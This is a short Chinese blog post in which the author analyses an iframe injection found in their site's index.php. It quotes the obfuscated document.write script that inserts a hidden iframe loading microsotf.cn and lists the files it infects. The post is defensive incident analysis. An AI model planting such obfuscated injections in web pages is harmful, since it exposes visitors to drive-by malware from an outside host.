最近莫名其妙的博客打不开,一查,发现用作跳转的index.php被加了东西。是一个iframe的马。那段php代码还有错误,汗~~所以造成无法跳转。后来经过调查,发现这个马的一些特征:
一般感染只感染 index.php , main.php, login.php, index.html。
核心代码类似:<script>document.write("<"+'if'+''+'ra'+''+"me"+' sr'+"c=\"ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"\" wid"+''+"th=1 h"+"eigh"+''+'t'+"="+"2></i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>
可以看到iframe的页面指向 microsotf.cn (不用惊恐,不是microsoft~~)。Google这个网页,发现这个网页是俄罗斯的。报告有2个病毒。现在已经无法访问了。
现在一时也查不到中招的原因。只有写个脚本修复被修改的文件吧。。。
